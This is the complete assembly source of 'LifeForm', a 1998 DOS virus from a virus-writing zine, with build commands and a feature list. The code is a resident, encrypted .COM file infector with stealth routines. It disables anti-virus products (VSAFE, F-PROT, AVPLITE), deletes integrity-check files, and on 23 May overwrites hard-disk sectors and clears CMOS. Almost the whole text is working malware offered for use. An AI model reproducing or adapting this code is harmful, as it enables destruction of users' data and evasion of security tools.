
The LifeForm virus

H0l0kausT Issue 1


; Virus Name:  LifeForm 
; Author : ThE_WiZArD
; Origin : Spain, 1998.
; Length : 2101 bytes approx.
;
;
;
;⁄ƒƒƒƒƒƒƒƒƒƒƒƒø
;≥ Features ≥
;¿ƒƒƒƒƒƒƒƒƒƒƒƒŸ
;
; -Memory Resident (MCB) Encrypted parasitic virus.
; -Infects .COM files on Closing (3EH).
; -Full Stealth (Disinfection on OPEN (3Dh) & DEBUGGING (4B01H) and reinfects
; on CLOSING (3Eh) ).
; -FCB & DTA Stealth (sec = 62)
; -Time Stealth (AX=5700h), returns correct seconds.
; -Uses SFT`s to perform infection (less size and fuck TSR watchdogs).
; -Redirects Int03h to Int21h (less size and fuck debuggers).
; -Hook Int 24h to a dummy handler to hide errors.
; -Anti-Debug , Emulation and Anti-Heuristic Code.
; -Turns off VSAFE`s flags while infecting files and restore them later.
; -Breaks F-PROT's ability of detecting viruses (Thx to Wintermute)
; -When AVPLITE anti-virus is executed, the virus modifies the command line
; so heuristic analysis stays disabled.
; -Disables Stealth when a compression utility is running.
;
; -Delete CRC Checksums ( In current DIR )
;
; -> anti-vir.dat
; -> avp.crc
; -> chklist.tav
; -> chklist.ms
; -> ivb.ntz
; -> smartchk.cps
;
; On 23rd May destroys random sectors of the hard disk and the CMOS, and displays
; a funny payload.
;
;
;
;Thx go to: 29A staff.
;
;Fucks go to: Well , they know who they are.
;
;
;
; ThE_WiZArD
; wizard555@hotmailcom
;
;
;-=[ "Information is the greatest weapon of power to the modern wizard." ]=-

;
; To assemble: TASM /M LifeForm.ASM
; TLINK LifeForm
; EXE2COM LifeForm.EXE LifeForm.COM


.286
LifeForm segment byte public
assume cs:LifeForm,ds:LifeForm
org 0h


LifeForm_size equ (LifeForm_end-LifeForm_start)
Crypt_Size equ (Crypt_End-Crypt_Start)
Size_SB equ (Size_Sin_Buffer-LifeForm_Start)

LifeForm_start label byte


Delta_ofs equ word ptr $+1

mov bp,0100h ;Delta offset (precalc)

cli
neg sp ;Mess with Stack
neg sp ;TBCLEAN SUCKS !
sti

;*****************************************************************************
; ANTI-HEURISTIC DECRYPTOR *
;*****************************************************************************

Decrypt:
lea si,[bp+offset Crypt_Start]
mov di,si
push si
xor ax,ax
mov bx,Crypt_size/2+2

Xor_LOOP:
xor word ptr cs:[di],0000h ;XOR It !
nop
int 3h ;Fool Debugging
inc ax
jmp Fuck_TBAV2 ;FUCK Thunderbyte AV

Fuck_TBAV1:
jmp Fuck_TBAV3

Fuck_TBAV2:
add di,2h
jmp Fuck_TBAV1
Fuck_TBAV3:
cmp ax,bx ;Are we at the end?
jbe Xor_Loop ;No .. continue

ret ;Return

Crypt_Start label byte

;*****************************************************************************
; FOOL TRACING / EMULATION *
;*****************************************************************************
No_Trace:
cli
push ax ;Anti-Trace routine !
push -1 ;TBCLEAN catch this ;-)
inc sp
dec sp
pop ax
inc ax
pop ax
jz Check_for_TSR
mov al,2Eh ;CMOS: 2EH -> Checksum
out 70h,al ;Corrupt Checksum
out 71h,al
hlt ;Halt computer
int 19h ;Reboot

;*****************************************************************************
; CHECK FOR NOVELL AND TSR *
;*****************************************************************************
Check_for_TSR:
mov ax,':?' ;Check for TSR ...
int 21h
cmp bx,':*' ;Are we already
jne Install_MCB ;memory resident ?
jmp Return_File

LifeForm_LiveS db '#ThE_WiZArD' ;Of Course

;*****************************************************************************
; ROUTINE TO GO TSR *
;*****************************************************************************

Install_MCB:
mov al,21h ;Get Int21h
call Get_Int

mov word ptr cs:[OldInt21h][bp],bx ;Save Int21h
mov word ptr cs:[OldInt21h+02h][bp],es

mov ax,ds
dec ax
mov ds,ax ;Program's MCB segment
xor di,di

cmp byte ptr ds:[di],'Y' ;Is it a Z block?
ja MCB_OK ;YES !!
jmp Return_File ;No .. Exit ..

MCB_OK:
sub word ptr ds:[di+3],((LifeForm_Size/10h)+2)
sub word ptr ds:[di+12h],((LifeForm_Size/10h)+2)
add ax,word ptr ds:[di+3]
inc ax

mov ds,ax
mov byte ptr ds:[di],'Z' ;Mark block as Z
mov word ptr ds:[di+1],8 ;System memory
mov word ptr ds:[di+3],((LifeForm_Size/10h)+1)
mov word ptr ds:[di+8],4f44h ;Mark block as owned
mov word ptr ds:[di+0ah],0053h ;by DOS (444f53h,0)
inc ax

cld
push cs
pop ds
mov es,ax
mov cx,LifeForm_SiZe ;Copy virus to memory
mov si,bp
rep movsb

;*****************************************************************************
; SET INTERRUPTION 21H *
;*****************************************************************************

Set_int21h:
push es
pop ds

mov al,21h
mov dx, offset Int21h_LifeForm
call Set_Int ;Set new Int21h

Return_File:
push cs cs
pop ds es

;*****************************************************************************
; RESTORE .COM file AND SET REGISTERS = 0 *
;*****************************************************************************

Exit_COM:
mov bx,bp
lea si,HEADER
add si,bx
mov ax,100h
xchg ax,di
push di ;Return to program ...
movsw ;Copy four bytes
movsw

Reset_Reg:
xor ax,ax
sub bx,bx ;Set registers to 0
mov cx,bx
mov dx,bx
xor di,cx
sub si,di
xor bp,bp

ret ;Return to host

;*****************************************************************************
; FCB STEALTH *
;*****************************************************************************

Fcb_Stealth:
pushf
call dword ptr cs:[OldInt21h] ;Call to INT 21h
test al,al ;Error ?
jnz fcb_out ;Jmp if error

call push_all

mov ah,51h ;Get current psp
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h

mov es,bx ;Es=segment of psp
cmp bx,es:[16h] ;psp of COMMAND.COM?
jnz fcb_out1 ;no, then jmp
mov bx,dx ;DS:BX=FCB
mov al,[bx] ;1st byte of fcb
push ax ;save it

mov ah,2fh ;get DTA in ES:BX
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h

pop ax ;get first byte
inc al ;al=ffh therefor al=ZR
jnz fcb_old ;if != ZR jmp
add bx,7h ;extended fcb here, +7

Fcb_old:
cmp word ptr es:[bx+09h],'OC' ;It`s a .COM file ?
jne Fcb_out1

mov al,es:[bx+17h] ;Get file time stamp
and al,1fh ;Unmask seconds field
xor al,1fh ;62 seconds ?
jnz fcb_out1

and byte ptr es:[bx+17h],0E0h ;Erase erronous sec.

Fcb_SUB:
sub word ptr es:[bx+1dh],Size_SB ;sub away virus_size
sbb word ptr es:[bx+1fh],0 ;Sub with carry flag

Fcb_out1:
call pop_all ;Restore registers
Fcb_out:
iret ;Return control

;*****************************************************************************
; NEW INTERRUPT 21h *
;*****************************************************************************

Int21h_LifeForm:
cli
push ax ;Anti-Trace routine !
push -1 ;Kasp :-P
inc sp
dec sp
pop ax
inc ax
pop ax
jz Tsr_Check
iret
Tsr_Check:
sti
cmp ax,':?' ;Check for TSR ?
jnz Int21h_Check
mov bx,':*' ;Return :* !
iret

Int21h_Check:
xchg ax,bx
cmp bh,11h ;FCB Stealth
je STEALTH_fcb
cmp bh,12h
je STEALTH_fcb
cmp bh,4Eh ;HANDLE Stealth
je STEALTH_Hnd
cmp bh,4Fh
je STEALTH_Hnd
cmp bx,4b00h ;DELETE CrC shit
je Delete_Shit
cmp bx,4b01h ;DISINFECT File
je Disinfection
cmp bh,3Dh ;DISINFECT File
je Disinfection
cmp bh,6Ch ;DISINFECT File
je Disinfection
cmp bx,5700h ;HIDE Erroneous sec.
je STEALTH_Sec
cmp bh,3fh ;Fuck F-PROT
je Stealth_READ
cmp bh,3Eh ;INFECT File
je Infection
xchg ax,bx

ExitInt21h:
db 0eah ;Exit ...
Oldint21h dw ?,? ;Original Int 21h

Oldint24h dw ?,? ;Original int 24h
OldInt03h dw ?,?

Newint24h:
mov al,3 ;Return error in
iret ;function

Stealth_FCB:
xchg ax,bx
jmp FCB_Stealth

Stealth_HND:
xchg ax,bx
jmp HANDLE_Stealth

Stealth_READ:
xchg ax,bx
jmp Shit_F_PROT

Delete_Shit:
xchg ax,bx
jmp Check_Names

Disinfection:
xchg ax,bx
jmp disinfect_file

Infection:
xchg ax,bx
jmp Infect_File

;****************************************************************************
; DATE/TIME STEALTH *
;****************************************************************************

Stealth_Sec:
xchg ax,bx
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h
jnc ok_get_time

stc
retf 02h

ok_get_time:
push cx

and cx,1fh ;Unmask second field
xor cx,1fh ;62 seconds ?
pop cx
jne exit_get_time

or cl,01fh ;Changes seconds

exit_get_time:
clc
retf 02h

;*****************************************************************************
; HANDLE STEALTH *
;*****************************************************************************

Handle_Stealth:
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h
jnc Handle_OK

stc
retf 02h
Handle_OK:
call push_all ;Push this shit !

call get_env

cmp ax,"-F" ;F-PROT (Fuck POTATOE)
jz not_infected

cmp ax,"RA" ;ARJ
jz not_infected

cmp ax,"AR" ;RAR
je not_infected

cmp ax,"KP" ;PK*
je not_infected

cmp ax,"HL" ;LHA
je not_infected

cmp ax,"AB" ;BACKUP
je not_infected

mov ah,2Fh ;get DTA
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h

mov al,es:[bx+16h] ;Get file time stamp
and al,1fh ;Unmask seconds field
xor al,1fh
jnz not_infected

sub word ptr es:[bx+1ah],Size_SB ;Subs virus size
sbb word ptr es:[bx+1ch],0 ;and places coherent
and byte ptr es:[bx+16h],0F1h ;seconds

not_infected:
call pop_all ;Restore registers
retf 02h

;*****************************************************************************
; MAKE "F-PROT" DOESNT DETECT ANY VIRUS *
;*****************************************************************************

Avers db 'Quo vadis Fridrik? ... and you Frans still working on this shit.'

; Breaks F-prot's ability of detecting viruses: when it reads data from a
; file the virus sends the interrupt vector table , so F-prot doesn't
; detect any virus (Thx to Wintermute)

Shit_F_PROT:
call push_all
cmp al,1
jz Exit_READ
cmp bx,8
jnz Exit_READ

call get_env

cmp ax,"-F" ;F-PROT ?
jnz Exit_READ

call pop_all

pushf
call dword ptr cs:[Oldint21h]
call push_all
push ds dx
pop di es ;Send interrupt
xor si,si ;vector table
mov ds,si
rep movsb

call pop_all ;Quo Vadis Fridrik ?
retf 2

Exit_READ:
call pop_all
jmp ExitInt21h

;*****************************************************************************
; ROUTINE TO INFECT *
;*****************************************************************************

Infect_File:
cmp bx,4h ;Erroneous handle ?
ja Infect_OK
jmp ExitInt21h ;Bye Bye .. !

Error: jmp Exit

Infect_OK:
call push_all ;Save this shit ;)
call Disable_KB ;Disable Keyboard
call Set_Int03h ;Set NewInt03h

call Vsafe_off ;Turn off Vshit ;)

mov ah,45h
int 03h ;Duplicate handle

Close_Cont:
xchg bx,ax
push ax

mov ah,3Eh ;Close new handle in
int 03h ;order to update
pop bx ;directory entry

call Get_SFT ;Get Da`SFT

Check_File:
cmp word ptr es:[di+28h],'OC' ;It is a .COM file ?
jnz Error

Check_Size:
cmp word ptr es:[di+11h],0F63Bh ;It is > 63k ?
ja Error

call Check_Infect ;It is infected ?
jc Error

Check_COMM:
mov ax,word ptr es:[di+20h] ;COMMAND.COM ?
cmp ax,'OC'
jnz Save_Stuff
mov ax,word ptr es:[di+22h]
cmp ax,'MM'
jz Error

Save_Stuff:
mov cx,2h ;Save and set file
xchg cx,word ptr es:[di+02h] ;open mode (R/W)
push cx

xor al,al ;Save and set file
xchg al,byte ptr es:[di+04h] ;atribute
push ax

push word ptr es:[di+15h] ;Save file pointer
push word ptr es:[di+17h] ;position

in ax,40h ;Get Encryption KEY
or ax,ax
jnz Key_OK
inc ax

Key_Ok:
mov word ptr cs:[Clave],ax ;Save key

Read_Header:
call Lseek_START

push cs
pop ds ;CS=DS

mov ah,3fh
mov cx,4h
lea dx,Header ;Read first 4h bytes
int 03h

Check_Header:
mov cx,word ptr cs:[Header+00h]
add cl,ch ;Add markers M+Z
cmp cl,"Z"+"M" ;It`s an .EXE file ?
jne Infect_COM
jmp Restore

Infect_COM:
cmp word ptr cs:[Header+00h],20CDh ;Int20h Instruction ?
jz Restore ;Exit !
cmp byte ptr cs:[Header+00h],90h ;InVircible bait?
jz Restore ;Exit !

call Lseek_END

mov delta_ofs,ax ;Store Delta Offset
add delta_ofs,100h

sub ax,3h
mov word ptr cs:[jump_address+1],ax ;Set the JMP Address

push di bx es cs ;Save Stuff
pop es ;CS=ES

cld
mov di,offset XOR_LOOP ;DI= Our Buffer

mov word ptr es:[DI],812Eh ;XOR WORD PTR CS:
inc di
inc di

Gen_INDEX_DI:
mov byte ptr es:[DI],35h ;[DI]
inc di
Gen_KEY:
mov ax,word ptr cs:[Clave] ;Move the decryption
stosw ;KEY

call Copy&Crypt ;Copy & Encrypt virus

pop es bx di

call Lseek_END

call Set_Int24h ;Set NewInt24h

mov ah,3Fh ;Write Virus
inc ah
lea dx,Buffer ;Encrypted virus
mov cx,Size_SB ;Virus size
int 03h
jc Restore

call Lseek_START

mov ah,3Fh
inc ah
lea dx,Jump_Address ;Write JMP
mov cx,4h
int 03h

call Rest_Int24h

Restore:
pop word ptr es:[di+17h] ;Restore file pointer
pop word ptr es:[di+15h] ;position

pop ax ;Restore file
mov byte ptr es:[di+04h],al ;atribute

pop cx ;Restore file open
mov word ptr es:[di+02h],cx ;mode

call Res_Stuff

Exit:
call Vsafe_on
call Rest_Int03h
call Enable_KB
call pop_all ;Restore this shit !
jmp ExitInt21h ;Exit ...

;****************************************************************************
; DISINFECTION *
;****************************************************************************

Disinfect_file:
call push_all ;Save this shit ;-)
call Set_Int03h

cmp ax,6c00h ;Extended open ?
jz extended
mov si,dx
Extended:
mov di,ds

call Vsafe_Off ;Turn OFF Vshit

Open_Dsf:
mov ds,di ;Opens the file !
mov dx,si
xor cx,cx
mov ax,3D00h
int 03h
jnc Open_OK
jmp Exit

Open_OK:
call Set_Int24h

xchg ax,bx
call get_sft ;Get Da`SFT
jc Error_Dsf

cmp word ptr es:[di+28h],'OC' ;It is a .COM file ?
jnz Error_Dsf

Check_Inff:
call Check_Infect ;Is it infected ?
jc Save_This

Error_Dsf:
jmp Exit_Close

Save_This:
call Disable_KB

mov cx,2h ;Save and set file
xchg cx,word ptr es:[di+02h] ;open mode (R/W)
push cx

xor al,al ;Save and set file
xchg al,byte ptr es:[di+04h] ;atribute
push ax

push word ptr es:[di+15h] ;Save file pointer
push word ptr es:[di+17h] ;position

push cs ;CS=DS
pop ds

call Lseek_START

mov ah,3fh
mov cx,4h
lea dx,Header ;Read first 4 bytes
int 03h

mov cx,word ptr cs:[Header+00h]
add cl,ch ;Add markers M+Z
cmp cl,"Z"+"M" ;It`s an .EXE file ?
jz Rest_all


Read_OrigHeader:
mov ax,word ptr es:[di+11h] ;Get filesize
sub ax,4h ;Lseek 4 bytes before
mov word ptr es:[di+15h],ax ;end

mov ah,3fh
mov cx,04h ;Read original header
lea dx,Header
int 03h

call Lseek_START

Write_OrigHeader:
mov ah,3fh ;Write original
inc ah ;Header
mov cx,4h ;COM header
lea dx,Header
int 03h

call Lseek_END

call Res_Time&Lenght

Rest_all:
pop word ptr es:[di+17h] ;Restore file pointer
pop word ptr es:[di+15h] ;position

pop ax ;Restore file
mov byte ptr es:[di+04h],al ;atribute

pop cx ;Restore file open
mov word ptr es:[di+02h],cx ;mode

call Res_Stuff

Exit_Close:
mov ah,3eh ;Close file
int 03h

call Rest_Int24h
jmp exit

;*****************************************************************************
; ADD PARAMETERS TO COMMAND LINE OF AVP *
;*****************************************************************************

check_names:
call push_all

mov si,dx

find_ext:
lodsb

cmp al,'.' ;Scan for the dot in
jne find_ext ;the filename
std

lodsw

xor cx,cx
mov di,offset AV_scanner - 1
push cs
pop es

name_loop:
mov cl,byte ptr cs:[di] ;CS:DI = size of
dec di ;String
push si
repe cmpsb ;Compare the names
pop si
je found_name ;Found AVP ?
sub di,cx

cmp di,offset found_avplite
jbe tail_1_fail

jmp short name_loop

found_name:
cmp di,offset found_avplite ;AVPlite
jbe avplite_fix

jmp short tail_1_fail

avplite_fix:
cld ;Change command line
pop es
push es ;ES = param block
;Segment

mov di,word ptr es:[bx+2] ;Get command tail from
mov si,di ;Param block
mov ax,word ptr es:[bx+4]
mov es,ax
mov ds,ax ;Command tail!

inc di ;Increase till we are
;past tail count

cmp byte ptr [si],0 ;Any parameters ??
je avplite_tail

mov cx,127 ;Tail length
mov al,0dh
repne scasb
jne tail_1_fail

avplite_tail:
add byte ptr [si],8 ;Move our pointer?
push cs
pop ds

mov si,offset avplite_cmd ;AV param to add?
mov cx,9
rep movsb

tail_1_fail:
cld ;Ready to finish up?
call pop_all
jmp Delete_CrC

;****************************************************************************
; SAVE ALL REGISTERS IN THE STACK *
;****************************************************************************

Push_all:
cli
pop word ptr cs:[ret_off]
pushf
push ax
push bx
push cx
push dx
push bp
push si
push di
push es
push ds
push word ptr cs:[ret_off]
sti
ret

;****************************************************************************
; RESTORE ALL REGISTERS FROM THE STACK *
;****************************************************************************

Pop_all:
cli
pop word ptr cs:[ret_off]
pop ds
pop es
pop di
pop si
pop bp
pop dx
pop cx
pop bx
pop ax
popf
push word ptr cs:[ret_off]
sti
ret

ret_off dw 0000h

;*****************************************************************************
; GET SYSTEM ENVIRONMENT *
;*****************************************************************************

Get_Env:
mov ah,62h
pushf
call DWORD ptr cs:[OldInt21h] ;Call to INT 21h

dec bx
mov es,bx
mov ax,word ptr es:[0008h]
ret

;*****************************************************************************
; SET NEW INTERRUPT 24h AND REDIRECT INT 21H OVER INT 03H *
;*****************************************************************************

Set_Int03h:
push ax bx ds es cs
pop ds

mov al,03h ;Get Int03h
call get_int

mov word ptr ds:[OldInt03h],bx ;Save it
mov word ptr ds:[OldInt03h+02h],es
mov dx,offset Call_Int21h ;Redirects to Int21h
call set_int

pop es ds bx ax
ret

Rest_Int03h:
push ax dx ds

mov al,03h ;Restore Int03h
lds dx,dword ptr cs:[OldInt03h]
call set_int

pop ds dx ax
ret

Set_Int24h:
push ax bx ds es cs
pop ds

mov al,24h ;Get Int24h
call get_int

mov word ptr ds:[OldInt24h],bx ;Save it
mov word ptr ds:[OldInt24h+02h],es
mov dx,offset NewInt24h ;Redirect to a dummy
call set_int ;routine ;)

pop es ds bx ax
ret

Rest_Int24h:
push ax dx ds

mov al,24h ;Restore Int24h
lds dx,dword ptr cs:[OldInt24h]
call set_int

pop ds dx ax
ret

;*****************************************************************************
; RETURN THE <AL> VECTOR in <ES:BX> *
;*****************************************************************************

Get_int:
push ax
xor ah,ah
rol ax,1
rol ax,1
xchg bx,ax
xor ax,ax
mov es,ax
les bx,dword ptr es:[bx+00h]
pop ax

ret

;*****************************************************************************
; SET <AL> INTERRUPT VECTOR to <DS:DX> *
;*****************************************************************************

Set_int:
push ax
push bx
push ds
cli
xor ah,ah
rol ax,1
rol ax,1
xchg ax,bx
push ds
xor ax,ax
mov ds,ax
mov word ptr ds:[bx+00h],dx
pop word ptr ds:[bx+02h]
sti
pop ds
pop bx
pop ax

ret

;*****************************************************************************
; LSEEK ROUTINES *
;*****************************************************************************

Lseek_START:
mov word ptr es:[di+15h],00h ;Lseek to Start
ret
Lseek_END:
mov ax,word ptr es:[di+11h] ;File length
mov word ptr es:[di+15h],ax ;Lseek to end
ret

;*****************************************************************************
; ROUTINE TO GET SFT *
;*****************************************************************************

Get_SFT:
push bx ;Save File Handle
mov ax,1220h ;Get the Job File Table
int 2fh ;(JFT)

mov ax,1216h ;Get System File Table
mov bl,es:[di] ;system file table entry
int 2fh ;(LIST) number
pop bx ;Restore the Handle
ret

;*****************************************************************************
; ROUTINE TO CHECK INFECTION *
;*****************************************************************************

Check_Infect:
clc

mov cx,word ptr es:[di+0dh] ;Time from SFT
mov dx,word ptr es:[di+0fh] ;Date from SFT

mov word ptr cs:[org_time],cx ;Save original time
mov word ptr cs:[old_date],dx ;Save file date

or cl,1fh
mov word ptr cs:[old_time],cx ;Save file time (62s)

mov cx,word ptr cs:[org_time] ;Get original time

and cl,1fh
xor cl,1fh ;62 sec ?
jnz Ret_No ;File infected

stc
Ret_No:
ret

;*****************************************************************************
; ROUTINE TO RESTORE STUFF *
;*****************************************************************************

Res_Stuff:
mov cx,word ptr ds:[old_time] ;Restore file time
mov dx,word ptr ds:[old_date] ;Restore file date

mov ax,5700h
inc ax
int 03h
ret

Res_Time&Lenght:

push ax
sub ax,06h ;Lseek 06 bytes before
mov word ptr es:[di+15h],ax ;end

mov ah,3fh
mov cx,2 ;Read original TIME
mov dx,offset ds:[Old_Time] ;Save it
int 03h

pop ax ;File length
sub ax,Size_SB ;Sub virus size
mov word ptr es:[di+15h],ax ;Lseek to end of
mov ah,3fh ;real file
inc ah
xor cx,cx
int 03h ;Remove the virus

ret


;*****************************************************************************
; ROUTINE TO COPY AND ENCRYPT THE VIRUS *
;*****************************************************************************

Copy&Crypt:
xor si,si ;Copy virus to buffer
mov di,offset Buffer
mov cx,Size_SB/2+1 ;Virus size
repe movsw

mov si,(offset Buffer+(Crypt_Start-LifeForm_Start)) ;Our Buffer
mov di,si
mov cx,Crypt_size/2+1 ;Virus size
mov dx,word ptr cs:[Clave] ;Key


Encrypt:
xor word ptr [di],dx ;Encrypts the copy
movsw
loop Encrypt
ret

;*****************************************************************************
; ROUTINE TO CALL INT_21h *
;*****************************************************************************

Call_Int21h:
pushf
call DWORD PTR cs:[OldInt21h] ;Call Int 21h
retf 02h

;*****************************************************************************
; FUCK VSAFE ANTIVIRUS *
;*****************************************************************************

Vsafe_OFF:
push bx cx dx

mov ax,0fa02h ;Turn off VSAFE's flags
mov dx,5945h
mov bl,00000000b ;New flags :-)
int 03h
mov byte ptr cs:[VShit],cl ;Save flags.

pop dx cx bx

ret

Vsafe_ON:
push bx cx dx

mov ax,0fa02h
mov dx,5945h ;Restore VSAFE's flags
mov bl,byte ptr cs:[VShit]
and bl,11111011b ;Turn off write-protected
int 03h ;flag (cache stuff)

pop dx cx bx

ret

;*****************************************************************************
; DISABLE/ENABLE KEYBOARD *
;*****************************************************************************

Disable_KB:
in al,21h
or al,00000010b
out 21h,al ;Disable KeyBoard
ret
Enable_KB:
in al,21h ;Enable KeyBoard
and al,not 2
out 21h,al
ret

;*****************************************************************************
; DELETE CRC FILES *
;*****************************************************************************
Delete_crc:
call push_all
call Set_Int03h ;Set new Int24h & 03h
call Set_Int24h
call Vsafe_Off

Check_Date:
mov ah,2bh ;Get Date
dec ah
int 03h
cmp dx,0517h ;23th May ?
jne Delete_CONT
call Rest_Int24h
call Rest_Int03h ;Restore Int24h & 03h
call pop_all
jmp PAYLOAD ;Go to PAYLOAD !!

Delete_CONT:
push cs
pop ds

xor cx,cx

lea dx,kill_msav ;Chklist.ms
call kill_crc_files

lea dx,kill_tbav
call kill_crc_files

lea dx,kill_smartchk ;Smartchk.cps
call kill_crc_files

lea dx,kill_avp ;Avp.crc
call kill_crc_files

lea dx,kill_ivb ;Ivb.ntz
call kill_crc_files

lea dx,kill_chklist ;Chklist.tav
call kill_crc_files

Exit_Delete:
call Vsafe_ON
call Rest_Int24h
call Rest_Int03h ;Restore Int24h & 03h
call pop_all

jmp ExitInt21h

kill_crc_files:
mov ax,4300h ;Clear Atributes
inc ax
int 03h

mov ah,41h ;Delete File
int 03h
retn

;*****************************************************************************
; DATA ABOUT ANTI-ANTIVIRUS *
;*****************************************************************************

; Names of antivirus

found_avplite db 'AVPLITE',7 ;AntiVirusPro

Av_Scanner:

; CRC files to delete!

kill_tbav db 'ANTI-VIR.DAT',0
kill_msav db 'CHKLIST.MS',0
kill_smartchk db 'SMARTCHK.CPS',0
kill_avp db 'AVP.CRC',0
kill_ivb db 'IVB.NTZ',0
kill_chklist db 'CHKLIST.TAV',0


; Parameters to ADD on the command line!

avplite_cmd db ' /h',0dh ;Skip heuristic scan


;*****************************************************************************
; !! ACTIVATION ROUTINE !! *
;*****************************************************************************
PAYLOAD:
call Disable_KB

mov ax,0002h ;Clear Screen
int 10h

call push_all

push cs cs
pop ds es

PREP_VIDEO:
mov ah,13h ;Set values
mov al,0
mov bh,0
mov bl,14
mov cx,45
mov dh,8 ;Line
mov dl,14 ;Position
lea bp,MENSAJE
int 10h ;Print messagge

mov bl,0fh
mov cx,52
mov dh,12
mov dl,10
lea bp,MENSAJE2 ;Messagge
int 10h ;Print messagge

mov cx,57
inc dh
lea bp,MENSAJE3 ;Messagge
int 10h ;Print messagge

call pop_all


;*****************************************************************************
; DESTROY THE HARDDISK *
;*****************************************************************************
Rip_hd:
xor dx, dx ;Clear dx
Rip_hd1:
mov cx, 1 ;Track 0, sector 1
mov ax,5000h
mov bx,0311h
xchg ax,bx
mov dl,80h
mov es,bx
int 13h ;Kill 17 sectors
jae rip_hd2
xor ah, ah
int 13h ;Reset disks if needed
Rip_hd2:
inc dh ;Increment head number
cmp dh, 4 ;If head number is below 4
jb rip_hd1 ;then go kill another 17
inc ch ;sectors increase track
cmp ch,69h ;number ... 69 tracks ?
jb rip_hd

kill_cmos1:
mov bp,7C00h
mov cx,29Ah ;Hello Dudes !

kill_cmos2:
mov al,cl
out 70h,al ;CMOS !!
xor al,al
out 71h,al ;Overwrite CMOS
loop kill_cmos2
jmp $ ;I love this ;)


MENSAJE DB 'ƒƒ [LifeForm] coded by ThE_WiZArD (1998) ƒƒ'
MENSAJE2 DB 'Cooler than a body on ice, Hotter than a rollin`dice'
MENSAJE3 DB 'Wilder than a drunken fight ... You`re gonna burn tonight'

Clave dw 0
Today db 0
Vshit db 0
Jump_address db 0E9h,90h,90h,01h ;JMP Address

Crypt_end label byte
DoNothing dw 0
Old_date dw 0 ;File date
Old_time dw 0 ;File time
Org_time dw 0
HEADER db 0CDh,020h,90h,01h ;Original 4 bytes

Size_Sin_Buffer:

Buffer db (offset Buffer-offset LifeForm_Start) dup (0)


LifeForm_end label byte
LifeForm ends
end LifeForm_start
